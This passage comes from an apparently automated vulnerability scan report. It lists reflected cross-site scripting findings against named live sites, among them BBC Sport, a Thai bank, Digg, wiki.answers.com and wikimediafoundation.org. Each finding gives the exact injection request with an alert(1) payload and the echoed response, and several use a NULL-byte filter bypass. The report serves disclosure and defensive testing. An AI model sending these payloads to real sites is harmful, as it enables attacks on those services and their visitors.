Set-Cookie: BBC-UID=44bd5c10a0a2b1a56e3ad0e501d37cc65546d17290b0f1bae4eb2ae4f00c46420Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: 'international',
       queryString: '4c5d5'-alert(1)-'7c4d8b95eda=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       u
...[SNIP]...

5.42. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85dce'-alert(1)-'6caf575a209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/formula_one/13267766.stm?85dce'-alert(1)-'6caf575a209=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:40 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:40 GMT
Connection: close
Set-Cookie: BBC-UID=b43dec20105221e8be7af9149103b83b7eac2260d01081699b6bf29de43f11ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b43dec20105221e8be7af9149103b83b7eac2260d01081699b6bf29de43f11ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429080000,
       editionToServe: 'international',
       queryString: '85dce'-alert(1)-'6caf575a209=1',
       referrer: null,
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'stor
...[SNIP]...

5.43. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e60"><script>alert(1)</script>dd2fb90dfc7 was submitted in the lang parameter. This input was echoed as 56e60\"><script>alert(1)</script>dd2fb90dfc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tradinginfo.services/price_update.php?lang=E56e60"><script>alert(1)</script>dd2fb90dfc7 HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:04 GMT
Server: Apache
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 1780

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...
<a href="/tradinginfo.services/price_update.php?lang=E56E60\"><SCRIPT>ALERT(1)</SCRIPT>DD2FB90DFC7">
...[SNIP]...

5.44. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70aa3"><script>alert(1)</script>ec340b53f66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70aa3\"><script>alert(1)</script>ec340b53f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tradinginfo.services/price_update.php/70aa3"><script>alert(1)</script>ec340b53f66 HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:57 GMT
Server: Apache
X-Powered-By: PHP/4.4.6
Connection: close
Content-Type: text/html
Content-Length: 3524

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...
<a href="/tradinginfo.services/price_update.php/70aa3\"><script>alert(1)</script>ec340b53f66?lang=E">
...[SNIP]...

5.45. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de0b9</script><script>alert(1)</script>95e29220397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slapde0b9</script><script>alert(1)</script>95e29220397/x22 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:28:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ffa5b357fe083908969281e173dca3b2; path=/
Last-Modified: Tue, 03 May 2011 13:28:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slapde0b9</script><script>alert(1)</script>95e29220397/x22" />
...[SNIP]...

5.46. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8be4</script><script>alert(1)</script>62b8c0eb977 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slap/x22c8be4</script><script>alert(1)</script>62b8c0eb977 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:29:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c218762d50aa02f115e7ac168d966505; path=/
Last-Modified: Tue, 03 May 2011 13:29:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slap/x22c8be4</script><script>alert(1)</script>62b8c0eb977" />
...[SNIP]...

5.47. http://trends.atipat.co.cc/thailand-breast-slap/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe906</script><script>alert(1)</script>bead810e6a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slap/x22?fe906</script><script>alert(1)</script>bead810e6a8=1 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:28:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=aacaa47ca502de63c9e105d1ba2c8a58; path=/
Last-Modified: Tue, 03 May 2011 13:28:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slap/x22?fe906</script><script>alert(1)</script>bead810e6a8=1" />
...[SNIP]...

5.48. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4c2b1<script>alert(1)</script>1c49e6dcebc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html4c2b1<script>alert(1)</script>1c49e6dcebc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 03 May 2011 18:26:13 GMT
Via: NS-CACHE: 100
Etag: "f62052063fafe17b92b7a12041fdba368296b1d2"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 03 May 2011 18:36:12 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html4c2b1<script>alert(1)</script>1c49e6dcebc", "diggs": 0});

5.49. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa8d"><script>alert(1)</script>ba33fe466f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Qbfa8d"><script>alert(1)</script>ba33fe466f1/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:49 GMT
X-Varnish: 598908747
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 43007

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Qbfa8d"><script>alert(1)</script>ba33fe466f1/Who_is_Director_of_Barkley_Bank_London" />
...[SNIP]...

5.50. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba5c9"><script>alert(1)</script>839fcaa3f68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/Who_is_Director_of_Barkley_Bank_Londonba5c9"><script>alert(1)</script>839fcaa3f68 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=lc64mcnme5fqp86ut2p3ka56v0; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:57 GMT
X-Varnish: 598910588
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 47853

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<base href="http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_Londonba5c9"><script>alert(1)</script>839fcaa3f68" target="_top">
...[SNIP]...

5.51. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5567c"><script>alert(1)</script>bedd0e03240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London?5567c"><script>alert(1)</script>bedd0e03240=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=fn8dtkt49vfaljcmtr184bmqa2; path=/; domain=.answers.com
Set-Cookie: fn8dtkt49vfaljcmtr184bmqa2=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:17 GMT
X-Varnish: 1509837386
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 72177


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
<base href="http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London?5567c"><script>alert(1)</script>bedd0e03240=1" target="_top">
...[SNIP]...

5.52. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Privacy_policy

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00d5702<script>alert(1)</script>fa20ff08d87 was submitted in the REST URL parameter 2. This input was echoed as d5702<script>alert(1)</script>fa20ff08d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:08 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87
Content-Length: 5466
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Privacy_poli
...[SNIP]...
<p style="font-weight: bold;">To check for "Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Privacy_policy%00d5702<script>
...[SNIP]...

5.53. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Privacy_policy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f08c"><script>alert(1)</script>7fdeaf40061 was submitted in the REST URL parameter 2. This input was echoed as 9f08c"><script>alert(1)</script>7fdeaf40061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:04 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061
Content-Length: 5494
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Privacy_poli
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061" title="Wikipedia:Privacy_policy%009f08c">
...[SNIP]...

5.54. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Special:Landingcheck

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00e48e6<script>alert(1)</script>6b2df5a64d6 was submitted in the REST URL parameter 2. This input was echoed as e48e6<script>alert(1)</script>6b2df5a64d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:30 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6
Content-Length: 5502
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Special:Land
...[SNIP]...
<p style="font-weight: bold;">To check for "Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Special:Landingcheck%00e48e6<script>
...[SNIP]...

5.55. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Special:Landingcheck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5fe7"><script>alert(1)</script>584d06cffe9 was submitted in the REST URL parameter 2. This input was echoed as e5fe7"><script>alert(1)</script>584d06cffe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:23 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9
Content-Length: 5530
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq78.wikimedia.org
X-Cache-Lookup: MISS from sq78.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Special:Land
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9" title="Wikipedia:Special:Landingcheck%00e5fe7">
...[SNIP]...

5.56. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Terms_of_Use

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008f2cf"><script>alert(1)</script>3a4264d3ec6 was submitted in the REST URL parameter 2. This input was echoed as 8f2cf"><script>alert(1)</script>3a4264d3ec6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:10 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Terms_of_Use%008f2cf"><script>alert(1)</script>3a4264d3ec6
Content-Length: 5482
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
